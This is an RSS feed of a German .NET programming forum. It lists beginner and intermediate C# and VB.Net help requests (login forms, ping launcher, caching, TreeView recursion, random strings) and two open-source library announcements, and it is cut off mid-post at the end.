<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>U-Labs Community - .Net</title>
		<link>https://u-labs.de/forum/</link>
		<description>Fragen und Probleme zu den .Net-Sprachen. .Net-Sprachen sind unter anderem C# und VB.Net.</description>
		<language>de</language>
		<lastBuildDate>Wed, 29 Apr 2026 10:20:53 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>1</ttl>
		<image>
			<url>https://u-labs.de/forum/images/ulabs/misc/rss.png</url>
			<title>U-Labs Community - .Net</title>
			<link>https://u-labs.de/forum/</link>
		</image>
		<item>
			<title><![CDATA[VB.Net [VB] Hilfe beim Forum-LogIn]]></title>
			<link>net-94/vb-hilfe-beim-forum-login-40304?goto=newpost</link>
			<pubDate>Tue, 22 Sep 2020 19:17:55 GMT</pubDate>
			<description>Hallo liebe Community, 
nach langen versuchen und keinen erzielten Erfolg - bin ich am verzweifeln. 
Und bin auf der Suche nach einen Rat von euch! 
...</description>
			<content:encoded><![CDATA[<div>Hallo liebe Community,<br />
nach langen versuchen und keinen erzielten Erfolg - bin ich am verzweifeln.<br />
Und bin auf der Suche nach einen Rat von euch!<br />
<br />
Ich habe einen XenForo Forum aufgesetzt und möchte über VB.Net einen LogIn programmieren.<br />
Spricht, das ganze basiert auf auslesen des Quellcodes.<br />
<br />
Erstmal zu den Code<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
Public Class Form1<br />
<br />
    Private Sub FrostButton1_Click(sender As System.Object, e As System.EventArgs) Handles FrostButton1.Click<br />
        Using EnviarPara As New Net.WebClient<br />
            Dim Param As New Specialized.NameValueCollection<br />
            Param.Add(&quot;username&quot;, TextBox1.Text)<br />
            Param.Add(&quot;password&quot;, TextBox2.Text)<br />
<br />
<br />
            Dim RespostaBytes As Byte() = EnviarPara.UploadValues(&quot;http://icr4ck3d.bplaced.net/index.php?login/&quot;, &quot;POST&quot;, Param)<br />
            Dim RespostaHTML As String = (New System.Text.UTF8Encoding).GetString(RespostaBytes)<br />
<br />
            'Erfolgreich ANGEMELDET!<br />
            If RespostaHTML.Contains(&quot;&quot;) Then<br />
                MsgBox(&quot;&#9829;-lich Willkommen &quot; &amp; TextBox1.Text &amp; &quot;, &quot; &amp; vbNewLine &amp; &quot;Sie wurden erfolgreich mit dem iCR4CK3D-Server verbunden!&quot;, vbOKOnly + vbInformation, &quot;Status: Angemeldet &#9474; Copyright by &#8594; iCR4CK3D.DE &#8592; &quot;)<br />
<br />
<br />
<br />
                Form2.Show()<br />
                Me.Close()<br />
<br />
                'Falsches PASSWORT oder BENUTZERNAME<br />
            End If<br />
            If RespostaHTML.Contains(&quot;Du hast ein falsches Passwort eingegeben. Bitte versuche es noch einmal.&quot;) Then<br />
                Label2.Text = &quot;Zugang nicht gewährt!&quot;<br />
            End If<br />
<br />
        End Using<br />
    End Sub
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Ich möchte KEINE WERBUNG für mein Forum machen, zudem da auch nichts zu finden gibts.. da es lediglich<br />
nur für Testzwecke erstmal genutzt wird! (Website im Code enthalten).<br />
<br />
Das ganze soll so ablaufen:<br />
<br />
1. Man Registriert sich im Forum.<br />
2. Man kann das Programm downloaden.<br />
3. Man gibt seine Benutzerdaten ein. (Username + Password)<br />
4. Man loggt sich ein und die zweite Plattform öffnet sich.<br />
<br />
Was das ganze bezwecken soll ist, das ich später ein Chat darauf auslesen möchte mit den Benutzerdaten<br />
die sich dank des LogIn eingeloggt haben. Das man später darauf Chatten kann.<br />
<br />
Aber leider funktioniert garnichts daran.. ich hab schon einiges probiert. Aber er liest es nicht richtig aus anscheinend!<br />
Kann mir wer bitte weiter helfen?<br />
<br />
Vielen Dank im vorraus.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>sl33p</dc:creator>
			<guid isPermaLink="true">net-94/vb-hilfe-beim-forum-login-40304</guid>
		</item>
		<item>
			<title>C# Versionsverwaltung für C# und bash</title>
			<link>net-94/versionsverwaltung-fuer-c-bash-40088?goto=newpost</link>
			<pubDate>Sat, 07 Sep 2019 15:35:10 GMT</pubDate>
			<description>Hallo, 
 
ich suche nach einer Möglichkeit, um möglichst bequem C#/bash verwalten zu können.  
Bitte um Info, welches REPO (zb git) bzw. welche Tools...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich suche nach einer Möglichkeit, um möglichst bequem C#/bash verwalten zu können. <br />
Bitte um Info, welches REPO (zb git) bzw. welche Tools aus eurer Erfahrung heraus für die Versionsverwaltung geeignet sind. <br />
Gerne auch in Bezug auf Cloud vs Non-Cloud.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AFU</dc:creator>
			<guid isPermaLink="true">net-94/versionsverwaltung-fuer-c-bash-40088</guid>
		</item>
		<item>
			<title>C# Caching Buster einer MVC-Route auf Basis einer Razor-View in ASP.NET Core</title>
			<link>net-94/caching-buster-einer-mvc-route-basis-einer-razor-view-in-asp-net-core-40071?goto=newpost</link>
			<pubDate>Mon, 12 Aug 2019 19:35:04 GMT</pubDate>
			<description>ASP.NET Core besitzt in ihren TagHelpern einen coolen Parameter namens asp-append-version. Wenn man den auf true setzt, wird die Datei gehasht und...</description>
			<content:encoded><![CDATA[<div>ASP.NET Core besitzt in ihren TagHelpern einen coolen Parameter namens <i>asp-append-version</i>. Wenn man den auf true setzt, wird die Datei gehasht und automatisch als URL-Parameter angehangen. Dies verhindert das Cachen im Browser (gut, außer IE, aber das ist ja eigentlich auch kein Browser...) - Das ganze Arbeitet mit Caching auf Basis eines FileWatchers, also in Echtzeit und extrem performant. Für JS Dateien im Dateisystem super, da nutze ich das standardmäßig. <br />
<br />
Genau das will ich haben, aber für eine dynamisch generierte Razor-View. Die Ansicht gibt JavaScript-Code zurück, der dynamisch generierte Konfigurationsparameter enthält. Die Action dazu sieht wie folgt aus:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
public IActionResult Config() {<br />
    Response.ContentType = &quot;text/javascript&quot;;<br />
    string ExpireDate = DateTime.UtcNow.AddMonths(2).ToString(&quot;ddd, dd MMM yyyy HH:mm:ss&quot;, CultureInfo.InvariantCulture);<br />
    Response.Headers.Add(&quot;Expires&quot;, $&quot;{ExpireDate} GMT&quot;);<br />
    return View(&quot;~/Views/Home/Config.cshtml&quot;);<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
In .NET Core 2.2 ist eine Erweiterung AddFileVersionToPath() enthalten, die quasi das <i>asp-append-version</i> Attribut auf Dateien direkt anwendet. Sprich ohne den TagHelper. Da ich die LTS (2.1) verwende und das schon für einen Editor gebraucht habe, der via JS-Variable ein Stylesheet nachlädt, habe ich folgendes Polyfill: <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
public static class RazorExtensions {<br />
    /// &lt;summary&gt;<br />
    /// Gets the path to a file in wwwroot with version hash for cache management<br />
    /// &lt;/summary&gt;<br />
    public static string AddFileVersionToPath(this IRazorPage page, string path) {<br />
        var context = page.ViewContext.HttpContext;<br />
        IMemoryCache cache = context.RequestServices.GetRequiredService&lt;IMemoryCache&gt;();<br />
        var hostingEnvironment = context.RequestServices.GetRequiredService&lt;IHostingEnvironment&gt;();<br />
        var versionProvider = new FileVersionProvider(hostingEnvironment.WebRootFileProvider, cache, context.Request.Path);<br />
        return versionProvider.AddFileVersionToPath(path);<br />
    }<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Problem ist, dass dabei meine URLs kaputt gehen. Ich habe eben ja nicht einen einzigen Pfad, der im wwwroot liegt und an den er einfach seinen Cache-Buster anhängen soll wie /css/foo.css. Sondern er soll <i>/Views/Home/Config.cshtml.js</i> als Grundlage für den Hash nutzen und diesen dann aber an die Route <i>/home/config</i> anhängen. <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
@{ <br />
    string configPath = this.AddFileVersionToPath(&quot;../Views/Home/Config.cshtml&quot;);<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Da er als Basis den WebRoot nutzt, müsste das logisch richtig sein. Er ermittelt aber nicht mal den Hash. Und wie schon eben erwähnt, generiert er mir einen JS Tag mit <i>../Views/Home/Config.cshtml.js</i> der so natürlich auch nicht als Route existiert. <br />
<br />
Jemand eine Idee, wie man das fix lösen kann?<br />
Spontan fällt mir da nichts ein außer eben den FileVersionProvider  genauer anzuschauen und den ein Stück weit angepasst  nachzubauen, sodass zwischen zu hashender Datei und der Zieldatei  unterschieden werden kann.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/caching-buster-einer-mvc-route-basis-einer-razor-view-in-asp-net-core-40071</guid>
		</item>
		<item>
			<title>C# Open Source: U-Labs VBulletinEntity - VB Datenbanzugriff via EntityFramework Core</title>
			<link>net-94/open-source-u-labs-vbulletinentity-vb-datenbanzugriff-via-entityframework-core-40068?goto=newpost</link>
			<pubDate>Wed, 07 Aug 2019 15:47:55 GMT</pubDate>
			<description>Bild: https://u-img.net/img/3818Qg.png  (https://github.com/U-Labs/ULabs.VBulletinEntity) 
 
 
Guten Tag, 
 
ergänzend zum ersten U-Labs Open Source...</description>
			<content:encoded><![CDATA[<div><a href="https://github.com/U-Labs/ULabs.VBulletinEntity" target="_blank" rel="nofollow"><img src="https://u-img.net/img/3818Qg.png" border="0" alt="" /></a><br />
<br />
<br />
Guten Tag,<br />
<br />
ergänzend zum ersten U-Labs Open Source Projekt (<a href="https://u-labs.de/forum/net-94/open-source-u-labs-bbcode-parser-fuer-vbulletin-40067" target="_blank">BBCode-Parser für vBulletin</a>) folgt nun wie angekündigt das zweite Projekt. <br />
<br />
Hierbei handelt es sich um eine Library, die stark typisierte C# Klassen als Datenbankmodelle für den Zugriff auf die vBulletin Datenbank bereitstellt. Mit dem ebenfalls quelloffenen EntityFramework Core kann daher über den abgeleiteten DbContext direkt auf sämtliche Entitäten zugegriffen werden. Die Datenbanmodelle sind an .NET angepasst - sowohl von der Benennung als auch den Typen. Zu einem SQL-Enum existiert beispielsweise auch ein C# enum. Außerdem wurden vereinzelt Attribute umbenannt, die nicht ausreichend sprechend erscheinen. Aktuell sind 13 Datenbanktabellen vollständig sowie zwei weitere großteils Implementiert. <br />
<br />
Darüber hinaus existieren verschiedene Manager. Sie schaffen eine weitere Abstraktionsschicht auf Komponentenebene und sind dafür gedacht, den Zugriff auf gängige Community-Funktionen zu vereinfachen. Beispielsweise ermöglicht der <a href="https://github.com/U-Labs/ULabs.VBulletinEntity/blob/master/ULabs.VBulletinEntity/Manager/VBThreadManager.cs" target="_blank" rel="nofollow">VBThreadManager.</a> das Laden eines Threads mit allen Abhängigkeiten, wie sie typischerweise für die Threadanzeige benötigt werden. Oder das Anlegen einer Antwort zu einem existierenden Thread. Dies lagert die vBulletin interne Logik auf die Library aus. Ferner ermöglichen sie das Arbeiten mit der VB-Datenbank, ohne tiefgreifende Kentnisse über die interne Datenbankstruktur. <br />
<br />
Beispiel: Beim erstellen einer Antwort werden auch entsprechende Attribute des dazugehörigen Threads aktualisiert. Dies betrifft u.a. die Id des letzten Posts, den Zeitstempel sowie weitere Meta-Daten. VB verwendet sie zur Darstellung in den Foren.<br />
<br />
Wie schon beim BBCode-Parser existiert auch hier ein <a href="https://github.com/U-Labs/ULabs.VBulletinEntity/tree/master/ULabs.VBulletinEntityDemo" target="_blank" rel="nofollow">Beispiel-Projekt</a>. Es beinhaltet nicht alle Funktionalitäten, aber bietet eine gute Übersicht über die grundsätzliche Funktionsweise.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/open-source-u-labs-vbulletinentity-vb-datenbanzugriff-via-entityframework-core-40068</guid>
		</item>
		<item>
			<title>C# Open Source: U-Labs BBCode-Parser für vB</title>
			<link>net-94/open-source-u-labs-bbcode-parser-fuer-vb-40067?goto=newpost</link>
			<pubDate>Thu, 01 Aug 2019 18:09:20 GMT</pubDate>
			<description>Bild: https://u-img.net/img/6830Sp.png  
 
Guten Tag, 
 
heute habe ich das erste offizielle Open Source Repo von U-Labs auf Github gestellt:...</description>
			<content:encoded><![CDATA[<div><img src="https://u-img.net/img/6830Sp.png" border="0" alt="" /><br />
<br />
Guten Tag,<br />
<br />
heute habe ich das erste offizielle Open Source Repo von U-Labs auf Github gestellt: <a href="https://github.com/U-Labs/ULabs.BBCodeParser" target="_blank" rel="nofollow">ULabs.BBCodeParser<br />
</a> <br />
Es handelt sich um ein Ansatz, um die BBCodes von vBulletin mittels .NET Core in HTML zu konvertieren. Bewusst wurde auf Reguläre Ausdrücke verzichtet, die auf Basis von Ersetzungen die Umwandlung durchführen sollen. Stattdessen erzeugt die Libary aus dem BBCode ein hierarchisches Dokument, ähnlich wie HTML-Parser vorgehen. Ziel ist es, einen sauberen und stabilen Parser zu haben. Davon ist das Projekt zugegebenerweise noch ein Stück entfernt. Besonders verschachtelte Tags und Umbrüche werden teils falsch geparst. <br />
<br />
Schon seit längerem möchte ich meine überwiegend internen Repositorys aufräumen und dabei möglichst viel Open Source stellen. Sowohl prinzipiell aus dem OS-Gedanke heraus, als auch um Ordnung hereinzubringen. Einiges liegt als POC herum. Das muss strukturiert/dokumentiert und teils auch fertiggestellt werden, damit es sinnvoll für eine praktische Anwendung eingesetzt werden kann. Dementsprechend wird es nicht nur bei dem BBCode-Parser bleiben. Ist eher ein Anfang, weil die Codebasis hier überschaubar ist und daher mit relativ wenig Aufwand veröffentlicht werden konnte.<br />
<br />
Es würde mich natürlich auch freuen, wenn der eine oder andere interessierte Lust hat, mit Pull Requests an dem Projekt mitzuwirken.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/open-source-u-labs-bbcode-parser-fuer-vb-40067</guid>
		</item>
		<item>
			<title>VB.Net cmd-Befehl in VB.NET</title>
			<link>net-94/cmd-befehl-in-vb-net-40042?goto=newpost</link>
			<pubDate>Wed, 12 Jun 2019 16:40:17 GMT</pubDate>
			<description><![CDATA[Hallo, 
 
und zwar wollte ich ne' angegebene IP-Adresse/Webseite anpingen um zu sehen ob Sie noch Online ist. Das ganze funktioniert soweit, 
aber er...]]></description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
und zwar wollte ich ne' angegebene IP-Adresse/Webseite anpingen um zu sehen ob Sie noch Online ist. Das ganze funktioniert soweit,<br />
aber er ping die Seite/IP nur 4x an. Und dann schließt sich die Konsole wieder. Es ist mir bewusst das ich &quot;-t&quot; vorsetzen muss,<br />
um es dauerhaft anpingen zu können. Ich schätze mal das ich nen' Fehler im Code habe.. könnte mich jemand mal bitte aufklären, wo<br />
ran es liegt? Vielen Dank im vorraus!<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
Public Class Form1<br />
    Private Sub FrostButton1_Click(sender As Object, e As EventArgs) Handles FrostButton1.Click<br />
<br />
        Dim p As New Process<br />
        p.StartInfo.UseShellExecute = False<br />
        p.StartInfo.Arguments = &quot;-t &quot;<br />
        p.StartInfo.Arguments = FrostTextBox1.Text<br />
        p.StartInfo.FileName = &quot;ping.exe&quot;<br />
        p.Start()<br />
<br />
    End Sub<br />
End Class
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<font color="silver"><font size="1">- - - Aktualisiert - - -</font></font><br />
<br />
Hat sich erledigt.. hab den Fehler selbst entdeckt.<br />
Hier nochmal der Code falls jemand so etwas braucht.<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			Public Class Form1<br />
    Private Sub FrostButton1_Click(sender As Object, e As EventArgs) Handles FrostButton1.Click<br />
<br />
        Dim p As New Process<br />
        p.StartInfo.UseShellExecute = False<br />
        p.StartInfo.Arguments = &quot;-t &quot; + FrostTextBox1.Text<br />
        p.StartInfo.FileName = &quot;ping.exe&quot;<br />
        p.Start()<br />
<br />
    End Sub<br />
End Class
			
		<hr />
	</div>
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>sl33p</dc:creator>
			<guid isPermaLink="true">net-94/cmd-befehl-in-vb-net-40042</guid>
		</item>
		<item>
			<title>VB.Net Spotify Login ?</title>
			<link>net-94/spotify-login-40000?goto=newpost</link>
			<pubDate>Mon, 25 Mar 2019 18:28:48 GMT</pubDate>
			<description>Hallöchen, 
 
da ich mich seit mehreren Tagen damit rumschlage wende ich mich mal hier an Euch: 
 
#Und zwar würde ich gerne über die Spotify Api...</description>
			<content:encoded><![CDATA[<div>Hallöchen,<br />
<br />
da ich mich seit mehreren Tagen damit rumschlage wende ich mich mal hier an Euch:<br />
<br />
#Und zwar würde ich gerne über die Spotify Api mich bei Spotify einloggen und einen Song abspielen. Also ein kleiner &quot;Player&quot; den ich in eins meiner bestehenden Projekte einbauen wollen würde.<br />
<br />
Leider scheitere ich kläglich, da online einfach kein gescheites Tutorial besteht. (Client ID für die APi ist vorhanden) Und die Codes die ich finde und für mein Projekt denke nutzen zu können, funktionieren alle nicht.<br />
<br />
Kann mir da jemand weiterhelfen?<br />
<br />
Beste Grüße</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Walk Me Home</dc:creator>
			<guid isPermaLink="true">net-94/spotify-login-40000</guid>
		</item>
		<item>
			<title>C# FileTree generieren und als TreeView darstellen</title>
			<link>net-94/filetree-generieren-als-treeview-darstellen-39983?goto=newpost</link>
			<pubDate>Fri, 22 Feb 2019 06:19:52 GMT</pubDate>
			<description>Ich bin derzeit dabei, einen FileTree zu generieren. Hier werden alle Einträge als *FileNode* gespeichert und beinhalten dann die Childs: 
 
using...</description>
			<content:encoded><![CDATA[<div>Ich bin derzeit dabei, einen FileTree zu generieren. Hier werden alle Einträge als <b>FileNode</b> gespeichert und beinhalten dann die Childs:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
using System.Collections.Generic;<br />
using System.IO;<br />
<br />
namespace DSTEd.Core.IO {<br />
    public class FileNode {<br />
        private DirectoryInfo info = null;<br />
        private List&lt;FileNode&gt; children = new List&lt;FileNode&gt;();<br />
<br />
        public FileNode(DirectoryInfo info) {<br />
            this.info = info;<br />
        }<br />
<br />
        public string GetName() {<br />
            return this.info.Name;<br />
        }<br />
<br />
        public string GetPath() {<br />
            return this.info.FullName;<br />
        }<br />
<br />
        public void AddChildren(FileNode node) {<br />
            this.children.Add(node);<br />
        }<br />
<br />
        public List&lt;FileNode&gt; GetChildrens() {<br />
            return this.children;<br />
        }<br />
<br />
        public bool HasChildrens() {<br />
            return this.children.Count &gt; 0;<br />
        }<br />
    }<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
using System.Collections.Generic;<br />
using System.IO;<br />
<br />
namespace DSTEd.Core.IO {<br />
    public class FileSystem {<br />
        private List&lt;FileNode&gt; files = new List&lt;FileNode&gt;();<br />
<br />
        public FileSystem(string path) {<br />
            this.files.Add(this.Parse(new DirectoryInfo(path)));<br />
        }<br />
<br />
        private FileNode Parse(DirectoryInfo directory) {<br />
            FileNode node = new FileNode(directory);<br />
<br />
            foreach (DirectoryInfo dir in directory.GetDirectories()) {<br />
                node.AddChildren(this.Parse(dir));<br />
            }<br />
<br />
            foreach (var file in directory.GetFiles()) {<br />
                node.AddChildren(node);<br />
            }<br />
<br />
            return node;<br />
        }<br />
<br />
        public List&lt;FileNode&gt; GetChildren() {<br />
            return this.files;<br />
        }<br />
<br />
        public bool HasChildrens() {<br />
            return this.files.Count &gt; 0;<br />
        }<br />
    }<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Das ganze wird folgendermaßen initiiert:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
FileSystem files = new FileSystem(&quot;C:/whatever/sonstwo&quot;);
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Jetzt möchte ich anhand der rekursiven FileNodes eine TreevIew befüllen:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
TreeView tree = new TreeView();<br />
foreach (FileNode directory in files.GetChildren()) {<br />
    var item = new TreeViewItem { Header = directory.GetName() };<br />
<br />
    if (directory.HasChildrens()) {<br />
        foreach (FileNode d in directory.GetChildrens()) {<br />
            var tt = new TreeViewItem { Header = d.GetName()};<br />
<br />
            Items.Add(tt);<br />
        }<br />
    }<br />
<br />
    tree.Items.Add(item);<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<b>Jetzt zum Problem:</b><br />
Normalerweise müsste ich ja nun auch beim &quot;rendern&quot; das ganze rekursiv gestalten, bekomme da aber einen StackOverflow, obwohl ich auf Childs der FileNodes prüfe, deswegen hab ich das ganze nun erst einmal simple mit einer Schleife gemacht, der mir nur die ersten Childs ausgibt. Hierbei wiederholt der aber komischerweise immer Einträge, die bereits als TreeNode existieren:<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=9342&amp;d=1550816372" border="0" alt="Name:  Tree.PNG
Hits: 814
Größe:  8,2 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
Wie kann ich das ganze vernünftig umsetzen?</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=9342&amp;stc=1&amp;d=1550816372" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bubble Gum</dc:creator>
			<guid isPermaLink="true">net-94/filetree-generieren-als-treeview-darstellen-39983</guid>
		</item>
		<item>
			<title>C# RegEx Tool</title>
			<link>net-94/regex-tool-39931?goto=newpost</link>
			<pubDate>Fri, 16 Nov 2018 08:47:46 GMT</pubDate>
			<description>Hallo, 
 
gibt es ein Tool, mit dem man zum Beispiel aus einem String wie solr7.7.7.zip die Version rausbekommt? 
Ich stelle mir das Tool so vor, man...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
gibt es ein Tool, mit dem man zum Beispiel aus einem String wie solr7.7.7.zip die Version rausbekommt?<br />
Ich stelle mir das Tool so vor, man gibt den String ein, markiert den Teil, der mit durch eine RegEx generisch rauskommen sollte und erhält dann das passende Pattern dazu?<br />
<br />
Gruß<br />
AFU</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AFU</dc:creator>
			<guid isPermaLink="true">net-94/regex-tool-39931</guid>
		</item>
		<item>
			<title>C#: globale Methode</title>
			<link>net-94/c-globale-methode-39761?goto=newpost</link>
			<pubDate>Sat, 24 Feb 2018 09:56:07 GMT</pubDate>
			<description>Hallo, 
 
ich habe derzeit ein Programm (Code von jemand anders übernommen), welches aus mehreren Windows-Forms besteht.  
Dieses beinhaltet mehrere...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich habe derzeit ein Programm (Code von jemand anders übernommen), welches aus mehreren Windows-Forms besteht. <br />
Dieses beinhaltet mehrere Textboxen. <br />
<br />
In einer Form gibt es eine (private void) Methode, die zb etwas in textbox1.text schreibt. <br />
<br />
Soweit, so gut. <br />
<br />
Da mehrere Forms vorhanden sind, die Methode eigentlich aber auf das ganze Programm zutrifft, ist meine Frage: wie kann ich diese methode für das gesamte Programm verfügbar machen?`<br />
<br />
Mein Zugang: eine neue Klasse erstellen und dort die Methode definieren. Allerdings, muss ja das Programm wissen, in welche Textbox <b>aus welcher Form</b> es schreiben soll. <br />
<br />
Die Bezeichnung ist zwar mit textbox1.text für alle Forms gleich, die Forms variieren aber. <br />
<br />
Meine Zugang wäre also gewesen: Zu prüfen, ob das element zb form1.textbox1 existiert, wenn nicht, gehe zur nächsten form usw und schreibe es nur dann hinein, wenn es existiert oder aktiv ist.<br />
<br />
Was meint ihr?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AFU</dc:creator>
			<guid isPermaLink="true">net-94/c-globale-methode-39761</guid>
		</item>
		<item>
			<title>C#: Random für Zufallsbuchstabe erzeugt gleiches Ergebnis</title>
			<link>net-94/c-random-fuer-zufallsbuchstabe-erzeugt-gleiches-ergebnis-39758?goto=newpost</link>
			<pubDate>Mon, 12 Feb 2018 22:09:57 GMT</pubDate>
			<description>Hallo, 
 
wo liegt mein Fehler? Ich hätte gerne zufällig 36 Zeichen langen String, der sich aus dem angegeben String zufällig zusammensetzt. Was...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
wo liegt mein Fehler? Ich hätte gerne zufällig 36 Zeichen langen String, der sich aus dem angegeben String zufällig zusammensetzt. Was mache ich falsch?<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
//Rextester.Program.Main is the entry point for your code. Don't change it.<br />
//Compiler version 4.0.30319.17929 for Microsoft (R) .NET Framework 4.5<br />
<br />
using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text.RegularExpressions;<br />
<br />
namespace Rextester<br />
{<br />
    public class Program<br />
    {<br />
        public static void Main(string&#91;&#93; args)<br />
        {<br />
            //Your code goes here<br />
            <br />
            string zeichen = &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz&quot;;<br />
            <br />
            int zufallsbuchstabe = 0;<br />
            string final =&quot;&quot;;<br />
            <br />
            <br />
            for (int i=0; i&lt;36; i++)             {<br />
            <br />
            Random zufall = new Random();<br />
            zufallsbuchstabe = zufall.Next(0, 51);<br />
            <br />
                <br />
            final = final + zeichen.Substring(zufallsbuchstabe, 1);<br />
            //int position = zeichen.IndexOf(zufallszahl);<br />
            //final = zeichen.Substring(position, 1);<br />
                <br />
            <br />
                <br />
                }<br />
                <br />
            Console.WriteLine(&quot;Zufall! &quot; + final );<br />
        <br />
    }<br />
}<br />
}
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AFU</dc:creator>
			<guid isPermaLink="true">net-94/c-random-fuer-zufallsbuchstabe-erzeugt-gleiches-ergebnis-39758</guid>
		</item>
		<item>
			<title>C# obfuscator</title>
			<link>net-94/c-obfuscator-39756?goto=newpost</link>
			<pubDate>Mon, 05 Feb 2018 05:02:15 GMT</pubDate>
			<description>Hi, 
 
ich bin auf der Suche nach Empfehlungen für einen c#/.net Obfuscator.  
Kostenlos bzw. Kostenpflichtig ist beides willkommen. 
 
lg, 
AFU</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich bin auf der Suche nach Empfehlungen für einen c#/.net Obfuscator. <br />
